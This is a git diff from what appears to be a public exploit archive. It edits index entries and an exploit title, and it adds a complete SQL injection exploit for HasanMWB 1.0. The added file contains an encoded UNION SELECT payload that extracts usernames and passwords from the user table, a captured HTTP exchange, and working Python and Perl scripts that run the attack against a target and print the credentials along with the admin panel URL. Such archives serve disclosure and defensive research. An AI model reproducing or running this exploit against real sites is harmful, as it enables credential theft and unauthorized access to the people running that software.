diff --git a/exploits/linux/webapps/45933.py b/exploits/linux/webapps/45933.py
index 5e9571e0b..4fdfdbc0b 100755
--- a/exploits/linux/webapps/45933.py
+++ b/exploits/linux/webapps/45933.py
@@ -1,4 +1,4 @@
-# Exploit Title: Apache Superset 0.23 - Remote Code Execution
+# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
# Date: 2018-05-17
# Exploit Author: David May (david.may@semanticbits.com)
# Vendor Homepage: https://superset.apache.org/
diff --git a/exploits/php/webapps/45955.txt b/exploits/php/webapps/45955.txt
new file mode 100644
index 000000000..c31967927
--- /dev/null
+++ b/exploits/php/webapps/45955.txt
@@ -0,0 +1,100 @@
+# Exploit Title: HasanMWB 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
+# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
+#Host: TARGET
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
+#DNT: 1
+#Connection: keep-alive
+#Upgrade-Insecure-Requests: 1
+#HTTP/1.1 200 OK
+#Date: Wed, 05 Dec 2018 00:24:09 GMT
+#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+#X-Powered-By: PHP/5.6.30
+#Expires: Thu, 19 Nov 1981 08:52:00 GMT
+#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+#Pragma: no-cache
+#Content-Length: 2697
+#Keep-Alive: timeout=5, max=100
+#Connection: Keep-Alive
+#Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 1)
+#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
+# Etc..
+
+#!/usr/bin/python
+import urllib2
+import re
+
+print """
+ \\\|///
+ \\ - - //
+ ( @ @ )
+ ----oOOo--(_)-oOOo----
+HasanMWB 1.0 - SQL Injection
+ Ihsan Sencan
+ ---------------Ooooo----
+ ( )
+ ooooO ) /
+ ( ) (_/
+ \ (
+ \_)
+"""
+
+s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
+e = ("index.php?hsn=category&id=1")
+p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
+response = urllib2.urlopen(s+e+p)
+c = response.read()
+up = re.findall(r'
(.*)
', c)
+
+print "Server: ", response.info()['server']
+print (up)
+print "Login Url:"+(s)+"panel.php"
+
+
+#!/usr/bin/perl
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+
+print "**************************\n";
+print "HasanMWB 1.0 SQL Injection\n";
+print "Ihsan Sencan\n";
+print "**************************\n";
+
+use LWP::UserAgent;
+print "\nTarget:[http://localhost/[PATH]/] ";
+chomp(my $target=);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+
+$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
+$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
+$host = $target . "".$E."";
+$res = $cc->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/(.*?)<\/h2>/){
+print "[+] Success !!!\n";
+print "\n[+] Detail : $1\n";
+print "$target/panel.php";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 013bfdae5..015cb11be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10126,7 +10126,7 @@ id,file,description,date,author,type,platform,port
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
-45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
+45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,ttffdd,local,multiple,
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
@@ -40441,8 +40441,8 @@ id,file,description,date,author,type,platform,port
45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
-45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
-45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
+45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
+45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
@@ -40453,3 +40453,4 @@ id,file,description,date,author,type,platform,port
45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
+45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80